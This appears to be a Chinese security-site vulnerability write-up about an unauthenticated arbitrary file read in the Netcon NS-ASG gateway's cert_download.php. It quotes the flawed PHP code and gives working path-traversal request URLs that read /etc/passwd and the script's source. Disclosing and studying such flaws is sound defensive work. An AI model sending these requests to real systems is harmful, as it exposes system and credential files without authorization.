黑客街 黑客街

网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞

目录

漏洞描述 #

网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞

漏洞影响 #

网康 NS-ASG安全网关

FOFA #

网康 NS-ASG安全网关

漏洞复现 #

出现漏洞的文件为 /admin/cert_download.php

![2](C:Users47236Desktop2.png)<?php
$filename = substr($file,strpos('certs/',$certfile)+6);
//文件的类型
header('Content-type: application/pdf');
//下载显示的名字
header('Content-Disposition: attachment; filename="'.$filename.'"');
readfile("$certfile");
exit();
?>

此文件没有对身份进行校验即可下载任意文件

/admin/cert_download.php?file=test.txt&certfile=../../../../../../../../etc/passwd
网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞 
/admin/cert_download.php?file=test.txt&certfile=cert_download.php
网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞
What are your Feelings
黑客街导航站是一款努力把互联网安全站点集接到一起,希望为每个小伙伴提供良好的"安全"体验。

街头小贩 匿名追踪 杀软对比

黑客街公众号黑客街

黑客街公众号

我要合作黑客街

我要合作

关于我们 免责说明 商务合作

Copyright © 2022 黑客街   豫ICP备19005024号    站点地图